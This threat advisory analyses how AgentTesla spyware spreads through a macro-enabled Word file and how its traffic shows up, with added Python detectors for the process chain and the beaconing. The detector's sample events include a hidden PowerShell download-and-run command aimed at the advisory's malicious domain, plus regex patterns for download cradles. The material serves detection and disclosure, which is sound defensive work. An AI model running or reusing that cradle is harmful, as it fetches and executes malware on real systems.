During the first week of July 2017, malspam activity was observed delivering AgentTesla, spyware capable of keystroke and clipboard logging, screen capture, and theft of passwords saved in browsers [1][2]. This threat advisory discusses its delivery method and traffic analysis using NetWitness Logs and Packets.

The observed delivery document, “document.doc”, was first uploaded to VirusTotal on July 7th. This MS Word document contains embedded, obfuscated VBA macros that run automatically when the file is opened. When submitted to RSA’s pre-release What's This File service, the document received the maximum threat score.

agenttesla-wtf-1.png

As shown below, the cleaned-up VBA code contained in the document uses Document_Open to run automatically when the file is opened, and then calls Shell to launch an executable.

agenttesla-wtf-2.png

Following the process tree, powershell.exe is invoked to download “filenew.exe” from findmylogs[.]com and save the payload, a malicious executable, as “prcQE.exe” in the user's “\AppData\Local\Temp” folder.
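The chain above (Office document → powershell.exe download cradle → executable dropped in \AppData\Local\Temp) is a recognisable pattern on endpoint telemetry regardless of the specific domain or filename. The following is an added example, not code from the advisory or from RSA NetWitness: it walks constructed process events (pid, ppid, image, cmdline; this field layout is an assumption, loosely modelled on NetWitness Endpoint tracking data or a Sysmon-style source) and reports every Office → PowerShell → %TEMP% executable chain. The domain, filenames and drop path in the sample match the advisory; the exact PowerShell command line was not published and is constructed here.

```python
import re
from collections import defaultdict

# PowerShell command-line fragments typical of a download cradle.
CRADLE_RE = re.compile(
    r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    re.IGNORECASE,
)
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
USER_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def image_name(path):
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def find_macro_download_chains(events):
    """Return (office_pid, powershell_pid, dropped_exe, download_host) tuples for every
    Office -> powershell.exe (download cradle) -> executable-in-%TEMP% chain in events."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    hits = []
    for office in events:
        if image_name(office["image"]) not in OFFICE_IMAGES:
            continue
        for ps in children[office["pid"]]:
            if image_name(ps["image"]) != "powershell.exe" or not CRADLE_RE.search(ps["cmdline"]):
                continue
            m = URL_RE.search(ps["cmdline"])
            host = m.group(1) if m else None
            # The dropped binary may be started by PowerShell itself or by the Office
            # parent (the macro's Shell call), so look under both process ids.
            for launcher_pid in (ps["pid"], office["pid"]):
                for child in children[launcher_pid]:
                    if child is ps:
                        continue
                    img = child["image"]
                    if USER_TEMP_RE.search(img) and img.lower().endswith(".exe"):
                        hits.append((office["pid"], ps["pid"], img, host))
    return hits


# Constructed endpoint events mirroring the advisory's chain. The PowerShell command
# line is an assumption: the advisory names the download domain, filename and drop
# path but does not publish the exact invocation.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" C:\Users\victim\Downloads\document.doc'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                "'http://findmylogs.com/filenew.exe', $env:LOCALAPPDATA + '\\Temp\\prcQE.exe')\""},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\victim\AppData\Local\Temp\prcQE.exe",
     "cmdline": "prcQE.exe"},
    # Benign noise: an admin shell running PowerShell, and a Word instance that spawns nothing.
    {"pid": 500, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 510, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"pid": 600, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" C:\Users\victim\Documents\notes.docx'},
]

if __name__ == "__main__":
    for office_pid, ps_pid, dropped, host in find_macro_download_chains(SAMPLE_EVENTS):
        print(f"Office pid {office_pid} -> powershell pid {ps_pid} fetched from {host} and ran {dropped}")
```

Only the chain rooted at the malicious document is reported; the administrator's PowerShell session and the second Word instance produce no hits, which is the point of keying on the parent/child relationship rather than on powershell.exe alone.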

agenttesla-process-tree.png

agenttesla-download-session.png

agenttesla-checksum-files.png

NetWitness packet inspection tags this activity with the following metadata.

agenttesla-navigate.png

An RSA NetWitness Endpoint (aka ECAT) agent installed on the affected client machine shows the following tracking information and machine Indicators of Compromise (IOCs).

agenttesla-ecat-tracking-ta.png

agenttesla-ecat-iioc-ta.png

Once the victim is infected, AgentTesla begins outbound communication via HTTP POSTs to onlinesypoi[.]com. The highlighted fields below represent a possible signature for AgentTesla spyware [3].

agenttesla-beaconing.png

agenttesla-navigate-2.png

The domain onlinesypoi[.]com itself was also observed delivering AgentTesla binaries.
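Because the same domain both serves the binaries and receives the POST beacons, the traffic can be correlated on behaviour rather than on the exact header fields shown in the screenshots. The following is an added example, not code from the advisory or from RSA NetWitness: it takes constructed HTTP session metadata (timestamp, source, method, domain, path, status, content type and the first bytes of the response; this record layout is an assumption), identifies hosts that downloaded an executable and then POSTed repeatedly to a domain, and emits feed rows in the shape of the Live meta listed later in the advisory. The two domains are the advisory's IOCs; timestamps, internal addresses, URL paths and the “c2-domain” description value are constructed.

```python
from collections import defaultdict

# Response content types commonly used when serving a Windows executable.
PE_CONTENT_TYPES = {"application/x-msdownload", "application/x-dosexec", "application/octet-stream"}


def is_exe_download(s):
    """True if the session is a successful GET whose response looks like a PE file:
    the body starts with the 'MZ' magic, or the path is .exe with a binary content type."""
    if s["method"] != "GET" or s.get("status") != 200:
        return False
    if s.get("body_prefix", b"")[:2] == b"MZ":
        return True
    return s["path"].lower().endswith(".exe") and s.get("content_type", "") in PE_CONTENT_TYPES


def find_beacon_destinations(sessions, min_posts=3, window_seconds=3600):
    """For each source host that downloaded an executable, return the domains it POSTed
    to at least min_posts times within window_seconds of that first download."""
    first_download = {}
    posts = defaultdict(lambda: defaultdict(list))
    for s in sorted(sessions, key=lambda s: s["ts"]):
        if is_exe_download(s):
            first_download.setdefault(s["src"], s["ts"])
        elif s["method"] == "POST":
            posts[s["src"]][s["domain"]].append(s["ts"])

    beacons = {}
    for src, t0 in first_download.items():
        for domain, times in posts.get(src, {}).items():
            n = sum(1 for t in times if t0 <= t <= t0 + window_seconds)
            if n >= min_posts:
                beacons.setdefault(src, {})[domain] = n
    return beacons


def build_feed(sessions, beacons):
    """Turn the findings into feed rows shaped like the advisory's Live meta. The
    'c2-domain' value for POST destinations is an assumption; the advisory itself
    only shows 'delivery-domain'."""
    delivery = {s["domain"] for s in sessions if is_exe_download(s)}
    c2 = {d for per_host in beacons.values() for d in per_host}
    rows = []
    for domain in sorted(delivery | c2):
        desc = []
        if domain in delivery:
            desc.append("delivery-domain")
        if domain in c2:
            desc.append("c2-domain")
        rows.append({
            "domain": domain,
            "threat.source": "rsa-firstwatch",
            "threat.category": "malspam",
            "threat.description": ",".join(desc),
        })
    return rows


# Constructed session metadata. The domains are the advisory's IOCs; timestamps,
# internal addresses and URL paths are assumptions.
SAMPLE_SESSIONS = [
    {"ts": 1000, "src": "10.0.0.5", "method": "GET", "domain": "findmylogs.com",
     "path": "/filenew.exe", "status": 200, "content_type": "application/octet-stream",
     "body_prefix": b"MZ\x90\x00"},
    {"ts": 1100, "src": "10.0.0.5", "method": "POST", "domain": "onlinesypoi.com", "path": "/", "status": 200},
    {"ts": 1400, "src": "10.0.0.5", "method": "POST", "domain": "onlinesypoi.com", "path": "/", "status": 200},
    {"ts": 1700, "src": "10.0.0.5", "method": "POST", "domain": "onlinesypoi.com", "path": "/", "status": 200},
    {"ts": 2000, "src": "10.0.0.5", "method": "POST", "domain": "onlinesypoi.com", "path": "/", "status": 200},
    # The same domain also serving a binary to a second host (no MZ bytes captured, so
    # the .exe path plus content type is what identifies it).
    {"ts": 5000, "src": "10.0.0.7", "method": "GET", "domain": "onlinesypoi.com",
     "path": "/files/update.exe", "status": 200, "content_type": "application/x-msdownload"},
    # Benign noise: an image download and a host that POSTs to a login page without any prior download.
    {"ts": 1050, "src": "10.0.0.5", "method": "GET", "domain": "cdn.example.net",
     "path": "/logo.png", "status": 200, "content_type": "image/png", "body_prefix": b"\x89PNG"},
    *({"ts": 3000 + 60 * i, "src": "10.0.0.9", "method": "POST", "domain": "login.example.com",
       "path": "/auth", "status": 200} for i in range(5)),
]

if __name__ == "__main__":
    beacons = find_beacon_destinations(SAMPLE_SESSIONS)
    for row in build_feed(SAMPLE_SESSIONS, beacons):
        print(row)
```

The window and threshold are deliberately loose; in a real deployment they would be tuned against the beacon interval observed in the captured sessions, and the `MZ` check depends on the capture retaining at least the first two bytes of the response body.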

agenttesla-sessions.png

agenttesla-process-tree-2.png

agenttesla-download-session-2.png

agenttesla-checksum-files-2.png

agenttesla-checksum-files-3.png

Scan results for those binaries can be found here and here.

All IOCs from those HTTP sessions were added to the RSA FirstWatch Command and Control Domains feed on Live with the following meta:

  • threat.source = ‘rsa-firstwatch’
  • threat.category = ‘malspam’
  • threat.description = ‘delivery-domain’

Thanks to Kevin Stear and Prakhar Pandey for contributing to this threat advisory.

References:

  1. https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting
  2. https://cysinfo.com/agent-tesla-new-spyware-variant-plucked-hackers-arena/
  3. Fortinet Blog, “In-Depth Analysis of A New Variant of .NET Malware AgentTesla”